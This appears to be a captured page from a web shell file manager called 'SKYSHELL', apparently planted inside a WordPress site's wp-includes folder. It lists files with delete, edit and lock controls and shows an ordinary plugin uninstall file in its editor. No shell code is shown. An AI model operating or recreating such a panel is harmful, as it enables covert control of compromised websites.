📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
modern
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
1614.17 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: uninstall.php
<?php /** * WP Search With Algolia uninstall file. * * @author WebDevStudios <contact@webdevstudios.com> * @since 1.0.0 * * @package WebDevStudios\WPSWA */ if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { // If uninstall not called from WordPress, then exit. exit; }
Save